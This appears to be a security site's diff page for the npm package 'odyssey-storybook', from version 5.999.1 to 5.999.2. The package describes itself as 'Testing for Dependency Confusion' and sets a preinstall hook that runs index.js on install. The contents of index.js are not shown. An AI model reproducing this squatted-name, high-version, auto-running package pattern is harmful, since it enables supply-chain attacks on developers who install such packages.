odyssey-storybook 5.999.1 → 5.999.2
Sign up to get free protection for your applications and to get access to all the features.
- package/index.js +1 -1
- package/package.json +2 -2
package/index.js
CHANGED
package/package.json
CHANGED
@@ -1,12 +1,12 @@
|
|
1
1
|
{
|
2
2
|
"name": "odyssey-storybook",
|
3
|
-
"version": "5.999.
|
3
|
+
"version": "5.999.2",
|
4
4
|
"description": "Testing for Dependency Confusion",
|
5
5
|
"main": "index.js",
|
6
6
|
"scripts": {
|
7
7
|
"preinstall": "node index.js",
|
8
8
|
"test": "echo \"Error: no test specified\" && exit 1"
|
9
9
|
},
|
10
|
-
"author": "",
|
10
|
+
"author": "lezybot-1",
|
11
11
|
"license": "ISC"
|
12
12
|
}
|